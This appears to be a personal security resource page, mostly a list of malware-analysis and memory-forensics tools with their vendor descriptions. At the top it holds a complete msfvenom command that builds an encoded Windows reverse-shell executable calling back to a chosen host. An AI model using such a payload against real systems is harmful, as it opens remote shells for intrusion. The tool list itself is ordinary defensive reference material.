Resources
Hold this command real quick
- MSFvenom Windows reverse shell binary
  msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<IP address to connect back to> LPORT=<port to call back on> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
- Compress large files
  tar -c filename | gzip --best > file.tar.gz
Malware Analysis
- Atom
  - Atom is a text editor that’s modern, approachable, yet hackable to the core—a tool you can customize to do anything but also use productively without ever touching a config file.
- Sysinternals
  - SMB share: \\live.sysinternals.com\tools\
  - Windows Sysinternals is a part of the Microsoft TechNet website which offers technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.
- Wireshark
  - Wireshark is a network protocol analyzer for Unix and Windows.
- NetworkMiner
  - NetworkMiner makes it easy to perform advanced Network Traffic Analysis (NTA) by providing extracted artifacts in an intuitive user interface. The way data is presented not only makes the analysis simpler, it also saves valuable time for the analyst or forensic investigator.
- Mandiant Redline
  - Mandiant’s premier free tool provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.
- Regshot
  - Regshot is an open-source (LGPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one – done after doing system changes or installing a new software product.
- Hex editor (HxD)
  - HxD is a carefully designed and fast hex editor which, in addition to raw disk editing and modifying of main memory (RAM), handles files of any size.
- DumpIt
  - DumpIt is a compact portable tool which makes it easy to save the contents of your PC’s RAM.
- Autopsy
  - Autopsy is a digital forensics platform and graphical interface to The Sleuth Kit and other digital forensics tools. It is used by law enforcement, military, and corporate examiners to investigate what happened on a computer. You can even use it to recover photos from your camera’s memory card.
- PEview
  - PEview provides a quick and easy way to view the structure and content of 32-bit Portable Executable (PE) and Component Object File Format (COFF) files. This PE/COFF file viewer displays header, section, directory, import table, export table, and resource information within EXE, DLL, OBJ, LIB, DBG, and other file types.
- IDA Pro
  - IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all.
- Hopper Disassembler
  - Hopper is a reverse engineering tool for OS X and Linux that lets you disassemble and decompile your 32/64-bit Intel Mac, Linux, Windows and iOS executables!
- Recuva
  - Recuva can recover pictures, music, documents, videos, emails or any other file type you’ve lost. And it can recover from any rewriteable media you have: memory cards, external hard drives, USB sticks and more!
- Capture BAT
  - Capture BAT is a behavioral analysis tool of applications for the Win32 operating system family. Capture BAT is able to monitor the state of a system during the execution of applications and processing of documents, which provides an analyst with insights on how the software operates even if no source code is available. Capture BAT monitors state changes at a low kernel level and can easily be used across various Win32 operating system versions and configurations.
- Dependency Walker
  - Dependency Walker is a free utility that scans any 32-bit or 64-bit Windows module (exe, dll, ocx, sys, etc.) and builds a hierarchical tree diagram of all dependent modules. For each module found, it lists all the functions that are exported by that module, and which of those functions are actually being called by other modules. Another view displays the minimum set of required files, along with detailed information about each file including a full path to the file, base address, version numbers, machine type, debug information, and more.
- ProcDOT
  - There are plenty of tools for behavioral malware analysis. The de facto standard ones, though, are Sysinternals’ Process Monitor (also known as Procmon) and PCAP-generating network sniffers like Windump, Tcpdump, Wireshark, and the like. These “two” tools cover almost everything a malware analyst might be interested in when doing behavioral malware analysis. But there’s a major problem with these tools: each of them works in isolation, knowing nothing about the others, so it is hard to bring the separately recorded activities together into one picture. That’s where ProcDOT enters the stage: it fills this gap by merging those records together.
Memory Analysis
- Hex editor (HxD)
  - HxD is a carefully designed and fast hex editor which, in addition to raw disk editing and modifying of main memory (RAM), handles files of any size.
- DumpIt
  - DumpIt is a compact portable tool which makes it easy to save the contents of your PC’s RAM.
- Mandiant Redline
  - Mandiant’s premier free tool provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.